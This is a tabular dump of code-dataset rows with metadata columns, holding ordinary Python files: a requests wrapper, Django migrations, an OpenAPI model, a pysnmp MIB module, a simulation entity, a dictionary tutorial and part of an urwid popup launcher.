hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ca0f8935849a303fbba95f69b04309b363fb4396 | 283 | py | Python | src/web.py | zmcx16/ChaldeaStockObservatory-Core | 7e8a063961de7568c34f8e6c228757923e8c05cf | [
"MIT"
] | null | null | null | src/web.py | zmcx16/ChaldeaStockObservatory-Core | 7e8a063961de7568c34f8e6c228757923e8c05cf | [
"MIT"
] | null | null | null | src/web.py | zmcx16/ChaldeaStockObservatory-Core | 7e8a063961de7568c34f8e6c228757923e8c05cf | [
"MIT"
] | null | null | null | import requests
from common import *
def send_request(url):
try:
res = requests.get(url)
res.raise_for_status()
except Exception as exc:
print('Generated an exception: %s' % exc)
return ERR_WEB_ERROR, exc
return ERR_SUCCESS, res.text
| 17.6875 | 49 | 0.64311 | 38 | 283 | 4.631579 | 0.736842 | 0.102273 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.275618 | 283 | 15 | 50 | 18.866667 | 0.858537 | 0 | 0 | 0 | 1 | 0 | 0.092199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca0fa23769829004e7ffb2c63d03ff9112e69e4d | 837 | py | Python | app/account/migrations/0009_relation.py | nabechin/article | 63bbaaaa9c194cc259456c46d8c3ccd0f8ee10c1 | [
"MIT"
] | null | null | null | app/account/migrations/0009_relation.py | nabechin/article | 63bbaaaa9c194cc259456c46d8c3ccd0f8ee10c1 | [
"MIT"
] | 9 | 2020-07-09T15:29:48.000Z | 2020-07-29T13:05:30.000Z | app/account/migrations/0009_relation.py | nabechin/article | 63bbaaaa9c194cc259456c46d8c3ccd0f8ee10c1 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.12 on 2020-06-03 11:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('account', '0008_auto_20200530_1309'),
]
operations = [
migrations.CreateModel(
name='Relation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('follower', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='follower', to=settings.AUTH_USER_MODEL)),
('target', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='target', to=settings.AUTH_USER_MODEL)),
],
),
]
| 34.875 | 158 | 0.658303 | 98 | 837 | 5.479592 | 0.530612 | 0.05959 | 0.078212 | 0.122905 | 0.353818 | 0.268156 | 0.268156 | 0.268156 | 0.268156 | 0.268156 | 0 | 0.048706 | 0.215054 | 837 | 23 | 159 | 36.391304 | 0.768645 | 0.054958 | 0 | 0 | 1 | 0 | 0.08872 | 0.029151 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca1122f4acfb056bec2609b88ea6a3ab622c77e3 | 1,502 | py | Python | data-storage-manager/src/simcore_service_dsm/rest/generated_code/models/error_model.py | mguidon/aiohttp-dsm | 612e4c7f6f73df7d6752269965c428fda0276191 | [
"MIT"
] | null | null | null | data-storage-manager/src/simcore_service_dsm/rest/generated_code/models/error_model.py | mguidon/aiohttp-dsm | 612e4c7f6f73df7d6752269965c428fda0276191 | [
"MIT"
] | null | null | null | data-storage-manager/src/simcore_service_dsm/rest/generated_code/models/error_model.py | mguidon/aiohttp-dsm | 612e4c7f6f73df7d6752269965c428fda0276191 | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from .base_model_ import Model
from .. import util
class ErrorModel(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, errors=None): # noqa: E501
"""ErrorModel - a model defined in OpenAPI
:param errors: The errors of this ErrorModel. # noqa: E501
:type errors: List[str]
"""
self.openapi_types = {
'errors': 'List[str]'
}
self.attribute_map = {
'errors': 'errors'
}
self._errors = errors
@classmethod
def from_dict(cls, dikt) -> 'ErrorModel':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ErrorModel of this ErrorModel. # noqa: E501
:rtype: ErrorModel
"""
return util.deserialize_model(dikt, cls)
@property
def errors(self):
"""Gets the errors of this ErrorModel.
:return: The errors of this ErrorModel.
:rtype: List[str]
"""
return self._errors
@errors.setter
def errors(self, errors):
"""Sets the errors of this ErrorModel.
:param errors: The errors of this ErrorModel.
:type errors: List[str]
"""
self._errors = errors
| 23.107692 | 96 | 0.591877 | 175 | 1,502 | 4.977143 | 0.354286 | 0.041332 | 0.110218 | 0.086108 | 0.253731 | 0.082664 | 0.082664 | 0 | 0 | 0 | 0 | 0.015429 | 0.309587 | 1,502 | 64 | 97 | 23.46875 | 0.824494 | 0.424767 | 0 | 0.086957 | 0 | 0 | 0.052113 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.217391 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
ca13cd70000bf83f234b4a5745e0f78ca209c481 | 3,555 | py | Python | pysnmp/CISCO-CAS-IF-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/CISCO-CAS-IF-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/CISCO-CAS-IF-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module CISCO-CAS-IF-CAPABILITY (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-CAS-IF-CAPABILITY
# Produced by pysmi-0.3.4 at Mon Apr 29 17:35:01 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion")
ciscoAgentCapability, = mibBuilder.importSymbols("CISCO-SMI", "ciscoAgentCapability")
AgentCapabilities, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "AgentCapabilities", "ModuleCompliance", "NotificationGroup")
TimeTicks, Integer32, iso, ObjectIdentity, Unsigned32, IpAddress, Bits, MibIdentifier, Counter64, Counter32, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "Integer32", "iso", "ObjectIdentity", "Unsigned32", "IpAddress", "Bits", "MibIdentifier", "Counter64", "Counter32", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "NotificationType")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
ciscoCasIfCapability = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 7, 122))
ciscoCasIfCapability.setRevisions(('2009-12-04 00:00', '2004-08-10 00:00', '2003-12-03 00:00',))
if mibBuilder.loadTexts: ciscoCasIfCapability.setLastUpdated('200912040000Z')
if mibBuilder.loadTexts: ciscoCasIfCapability.setOrganization('Cisco Systems, Inc.')
ciscoCasIfCapabilityV5R000 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 122, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoCasIfCapabilityV5R000 = ciscoCasIfCapabilityV5R000.setProductRelease('MGX8850 Release 5.0')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoCasIfCapabilityV5R000 = ciscoCasIfCapabilityV5R000.setStatus('current')
ciscoCasIfCapabilityV5R015 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 122, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoCasIfCapabilityV5R015 = ciscoCasIfCapabilityV5R015.setProductRelease('MGX8850 Release 5.0.15')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoCasIfCapabilityV5R015 = ciscoCasIfCapabilityV5R015.setStatus('current')
ciscoCasIfCapabilityV12R04TPC3xxx = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 122, 3))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoCasIfCapabilityV12R04TPC3xxx = ciscoCasIfCapabilityV12R04TPC3xxx.setProductRelease('CISCO IOS 12.4T for Integrate Service\n Router (ISR) c2xxx and c3xxx platforms.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoCasIfCapabilityV12R04TPC3xxx = ciscoCasIfCapabilityV12R04TPC3xxx.setStatus('current')
mibBuilder.exportSymbols("CISCO-CAS-IF-CAPABILITY", ciscoCasIfCapabilityV5R015=ciscoCasIfCapabilityV5R015, ciscoCasIfCapability=ciscoCasIfCapability, ciscoCasIfCapabilityV5R000=ciscoCasIfCapabilityV5R000, PYSNMP_MODULE_ID=ciscoCasIfCapability, ciscoCasIfCapabilityV12R04TPC3xxx=ciscoCasIfCapabilityV12R04TPC3xxx)
| 101.571429 | 477 | 0.775527 | 358 | 3,555 | 7.695531 | 0.379888 | 0.008711 | 0.041379 | 0.056624 | 0.445372 | 0.349546 | 0.349546 | 0.349546 | 0.349546 | 0.345554 | 0 | 0.096005 | 0.091702 | 3,555 | 34 | 478 | 104.558824 | 0.7572 | 0.09564 | 0 | 0.222222 | 0 | 0 | 0.247037 | 0.020898 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.259259 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca19502a1cceb17f754e2906fb093b11b8434812 | 2,136 | py | Python | simulation/model/blocks/order.py | fladdimir/csa-simulation-based-sc-forecast | 80f176a783496f8859609f63b56c6199a73d9909 | [
"MIT"
] | 2 | 2020-11-04T17:34:38.000Z | 2021-08-13T07:55:23.000Z | simulation/model/blocks/order.py | fladdimir/csa-simulation-based-sc-forecast | 80f176a783496f8859609f63b56c6199a73d9909 | [
"MIT"
] | null | null | null | simulation/model/blocks/order.py | fladdimir/csa-simulation-based-sc-forecast | 80f176a783496f8859609f63b56c6199a73d9909 | [
"MIT"
] | 2 | 2021-05-28T02:55:44.000Z | 2021-08-03T13:56:10.000Z | import logging
from casymda.blocks.entity import Entity
from simpy.core import Environment
class Order(Entity):
def __init__(self, env: Environment, name: str):
super().__init__(env, name)
self._time_of_acceptance = -1
self._initial_eta = -1
self._eta = -1
self._ready_at = -1
self._sop_at = -1
self._finished_at = -1
@property
def time_of_acceptance(self):
return self._time_of_acceptance
@time_of_acceptance.setter
def time_of_acceptance(self, value):
self._time_of_acceptance = value
update(
self.name,
"time_of_acceptance",
self._time_of_acceptance,
self.env.now,
self,
)
@property
def initial_eta(self):
return self._initial_eta
@initial_eta.setter
def initial_eta(self, value):
self._initial_eta = value
update(self.name, "initial_eta", self._initial_eta, self.env.now, self)
@property
def eta(self):
return self._eta
@eta.setter
def eta(self, value):
self._eta = value
update(self.name, "eta", self._eta, self.env.now, self)
@property
def ready_at(self):
return self._ready_at
@ready_at.setter
def ready_at(self, value):
self._ready_at = value
update(self.name, "ready_at", self._ready_at, self.env.now, self)
@property
def sop_at(self):
return self._sop_at
@sop_at.setter
def sop_at(self, value):
self._sop_at = value
update(self.name, "sop_at", self._sop_at, self.env.now, self)
@property
def finished_at(self):
return self._finished_at
@finished_at.setter
def finished_at(self, value):
self._finished_at = value
update(self.name, "finished_at", self._finished_at, self.env.now, self)
def update(name: str, attribute: str, value: float, t: float, order: Order):
# (replaced by actual callback during emulation initialization)
logging.info(
f"order update - name: {name}, attribute: {attribute}, value: {value}, t: {t}"
)
| 25.428571 | 86 | 0.623596 | 281 | 2,136 | 4.455516 | 0.163701 | 0.057508 | 0.102236 | 0.091054 | 0.242812 | 0.107827 | 0.087859 | 0 | 0 | 0 | 0 | 0.003856 | 0.271536 | 2,136 | 83 | 87 | 25.73494 | 0.800771 | 0.028558 | 0 | 0.09375 | 0 | 0.015625 | 0.063676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21875 | false | 0 | 0.046875 | 0.09375 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca1b5eb38de0a406ce502a3a1fd87938d360c350 | 3,498 | py | Python | python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-python-containers_dictionary.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | [
"MIT"
] | null | null | null | python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-python-containers_dictionary.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | [
"MIT"
] | null | null | null | python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-python-containers_dictionary.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS231n Convolutional Neural Networks for Visual Recognition
http://cs231n.github.io/
Python Numpy Tutorial
http://cs231n.github.io/python-numpy-tutorial/
 ̄
python_numpy_tutorial-python-containers_dictionary.py
2019-07-03 (Wed)
"""
# Python Numpy Tutorial > Python > Containers
# Python's built-in container types:
# lists, dictionaries, sets, and tuples.
#
# (Python) Lists
# a mutable ordered list of values.
# A list is the Python equivalent of an array with useful functions.
# A Python list is resizeable and
# can contain elements of different types.
#
# Dictionaries
# stores key-value pairs
#
# Sets
# an unordered collection of distinct elements.
#
# Tuples
# an immutable ordered list of values.
# A tuple is similar to a list, but different in that
# tuples can be used as keys in dictionaries and
# as elements of sets.
#
# =[,,] (Python) list ~= Dynamic array (with useful functions)
# ={:,:,:} Dictionary ~= Map
# ={,,} Set = Set
# =(,) Tuples ~= (Python) list
#
# This example covers:
# Lists
# Slicing
# A concise syntax to access sublists.
# Loops
# You can loop over the elements of a list.
# The enumerate function returns the index & value.
# List comprehensions
# A concise way to loop through a list.
# e.g. 3 lines of code -> 1 line of code
#
# Dictionaries
# (Basics)
# Loops
# Dictionary comprehensions
#
# Sets
# (Basics)
# Loops
# Iterating over a set has the same syntax as a list.
# However you cannot make assumptions about the order.
# Set comprehensions
# Like list comprehension & dictionary comprehension,
# constructing a set is easy with set comprehensions.
#
# Tuple
# (Basics)
#
# Read more about:
# 4.6.4. Lists¶
# https://docs.python.org/3.5/library/stdtypes.html#lists
#
# 4.9. Set Types — set, frozenset¶
# https://docs.python.org/3.5/library/stdtypes.html#set
#
# 4.10. Mapping Types — dict
# https://docs.python.org/3.5/library/stdtypes.html#dict
#
# 5.3. Tuples and Sequences
# https://docs.python.org/3.5/tutorial/datastructures.html#tuples-and-sequences
print('Dictionary')
# Create a new dictionary
d = {'cat':'cute','dog':'furry'}
print( d )
#{'cat': 'cute', 'dog': 'furry'}
print( d['cat'] )
# cute
# Check if a dictionary has 'cat'.
print( 'cat' in d )
# True
# Set an entry in the dictionary.
d['fish'] = 'wet'
print( d['fish'] )
# wet
print( d )
#{'cat': 'cute', 'dog': 'furry', 'fish': 'wet'}
# Get an element with a default
print( d.get('monkey', 'N/A') )
# N/A
# because 'monkey' is not there, prints N/A
# Get an element with a default
print( d.get('fish','N/A') )
#wet
# because 'fish' is there, prints the value of it!
del d['fish']
print( d.get('fish','N/A') )
#N/A
# because 'fish' is deleted, 'fish' isn't in the list of the keys.
# So prints N/A
print('Loops')
d = {'person':2, 'cat':4, 'spider':8}
for animal in d: # Only the key is returned
#print( animal )
legs = d[animal]
print('A %s has %d legs.' %(animal, legs))
print('Dictionary comprehensions')
# Dictionary comprehensions are similar to list comprehensions.
# But these allow you to easily construct dictionaries.
nums = [0, 1, 2, 3, 4]
even_num_to_square = {x: x**2 for x in nums if x%2 == 0}
print( even_num_to_square )
#{0: 0, 2: 4, 4: 16} | 26.70229 | 81 | 0.636078 | 512 | 3,498 | 4.337891 | 0.361328 | 0.01891 | 0.034219 | 0.032418 | 0.235029 | 0.167042 | 0.139127 | 0.105808 | 0.105808 | 0.03602 | 0 | 0.02115 | 0.22956 | 3,498 | 131 | 82 | 26.70229 | 0.801113 | 0.785592 | 0 | 0.190476 | 0 | 0 | 0.201849 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.619048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
ca23c1c1fb9f0996c3429cd643f93153fd251931 | 307 | py | Python | tracker/migrations/0016_merge_20190914_1249.py | TreZc0/donation-tracker | 3a833a5eba3c0b7cedd8249b44b1435f526095ba | [
"Apache-2.0"
] | 39 | 2016-01-04T04:13:27.000Z | 2022-01-18T19:17:24.000Z | tracker/migrations/0016_merge_20190914_1249.py | TreZc0/donation-tracker | 3a833a5eba3c0b7cedd8249b44b1435f526095ba | [
"Apache-2.0"
] | 140 | 2015-11-01T01:19:54.000Z | 2022-03-10T13:00:33.000Z | tracker/migrations/0016_merge_20190914_1249.py | TreZc0/donation-tracker | 3a833a5eba3c0b7cedd8249b44b1435f526095ba | [
"Apache-2.0"
] | 35 | 2016-01-20T12:42:21.000Z | 2022-01-20T07:06:47.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.22 on 2019-09-14 16:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('tracker', '0015_add_speedrun_twitch_name'),
('tracker', '0015_add_allow_donations'),
]
operations = [
]
| 18.058824 | 53 | 0.638436 | 37 | 307 | 5.108108 | 0.837838 | 0.116402 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109244 | 0.224756 | 307 | 16 | 54 | 19.1875 | 0.684874 | 0.224756 | 0 | 0 | 1 | 0 | 0.285106 | 0.225532 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca2c0ab19ea859d07a1be0aeaa1c9e6aba93dfd7 | 5,424 | py | Python | mitzasql/ui/widgets/session_popup_launcher.py | vladbalmos/mitzasql | 06c2a96eb4494095b2b72bc1454199a4940b0700 | [
"MIT"
] | 69 | 2019-05-16T06:40:18.000Z | 2022-03-24T06:23:49.000Z | mitzasql/ui/widgets/session_popup_launcher.py | vladbalmos/mitzasql | 06c2a96eb4494095b2b72bc1454199a4940b0700 | [
"MIT"
] | 36 | 2019-05-15T19:55:24.000Z | 2021-07-22T07:07:14.000Z | mitzasql/ui/widgets/session_popup_launcher.py | vladbalmos/mitzasql | 06c2a96eb4494095b2b72bc1454199a4940b0700 | [
"MIT"
] | 8 | 2019-05-16T06:56:28.000Z | 2022-02-11T02:24:12.000Z | # Copyright (c) 2021 Vlad Balmos <vladbalmos@yahoo.com>
# Author: Vlad Balmos <vladbalmos@yahoo.com>
# See LICENSE file
import urwid
from .. import main_loop as shared_main_loop
from .error_dialog import ErrorDialog
from .info_dialog import InfoDialog
from .quit_dialog import QuitDialog
class SessionPopupLauncher(urwid.PopUpLauncher):
DEFAULT_WR = 60
DEFAULT_HR = 30
def __init__(self, widget):
super().__init__(widget)
self._max_width = None
self._max_height = None
self._width_ratio = self.DEFAULT_WR
self._height_ratio = self.DEFAULT_HR
# Used in testing
self.showing_error_modal = False
self._popup_factory_method = None
def create_pop_up(self):
return self._popup_factory_method()
def get_pop_up_parameters(self):
width = int(self._width_ratio * self._max_width / 100)
height = int(self._height_ratio * self._max_height / 100)
left = (self._max_width - width) / 2
top = (self._max_height - height) / 2
return {'left': left, 'top': top, 'overlay_width': width, 'overlay_height':
height}
def close_pop_up(self, *args, **kwargs):
self.showing_error_modal = False
self._reset_popup_size_ratio()
return super().close_pop_up()
def quit(self, *args, **kwargs):
raise urwid.ExitMainLoop()
def show_fatal_error(self, error):
self.showing_error_modal = True
def factory_method():
dialog = ErrorDialog(error, title=u'Unhandled Exception',
prefix='An unhandled error occured. Exception details:')
urwid.connect_signal(dialog, dialog.SIGNAL_OK, self.quit)
return urwid.Filler(dialog)
self._popup_factory_method = factory_method
return self.open_pop_up()
def show_error(self, error, on_close=None):
self.showing_error_modal = True
def on_ok_signal(*args, **kwargs):
self.close_pop_up()
if callable(on_close):
on_close()
def factory_method():
dialog = ErrorDialog(error)
urwid.connect_signal(dialog, dialog.SIGNAL_OK,
on_ok_signal)
return urwid.Filler(dialog)
self._popup_factory_method = factory_method
return self.open_pop_up()
def show_info(self, message, on_close=None):
def on_ok_signal(*args, **kwargs):
self.close_pop_up()
if callable(on_close):
on_close()
def factory_method():
dialog = InfoDialog(message)
urwid.connect_signal(dialog, dialog.SIGNAL_OK, on_ok_signal)
return urwid.Filler(dialog)
self._popup_factory_method = factory_method
return self.open_pop_up()
def close_pop_up_then(self, callback):
'''Close popup then execute callback'''
def fn(*args, **kwargs):
self.close_pop_up()
callback()
return fn
def show_quit_dialog(self, on_no=None):
def factory_method():
dialog = QuitDialog()
urwid.connect_signal(dialog, dialog.SIGNAL_OK, self.quit)
if on_no is not None:
urwid.connect_signal(dialog, dialog.SIGNAL_CANCEL,
self.close_pop_up_then(on_no))
else:
urwid.connect_signal(dialog, dialog.SIGNAL_CANCEL,
self.close_pop_up)
return urwid.Filler(dialog)
self._popup_factory_method = factory_method
return self.open_pop_up()
def show_loading_dialog(self):
self._width_ratio = 40
self._height_ratio = 30
def factory_method():
dialog = urwid.Text(u'\nLoading...', align='center')
dialog = urwid.Filler(dialog)
dialog = urwid.AttrMap(urwid.LineBox(dialog), 'linebox')
return dialog
self._popup_factory_method = factory_method
result = self.open_pop_up()
shared_main_loop.refresh()
return result
def show_big_popup(self, widget):
self._width_ratio = 90
self._height_ratio = 80
def factory_method():
dialog = urwid.AttrMap(urwid.LineBox(widget, title=widget.name), 'linebox')
urwid.connect_signal(widget, widget.SIGNAL_ESCAPE, self.close_pop_up)
urwid.connect_signal(widget, widget.SIGNAL_QUIT,
self.close_pop_up_then(self.show_quit_dialog))
return dialog
self._popup_factory_method = factory_method
result = self.open_pop_up()
shared_main_loop.refresh()
return result
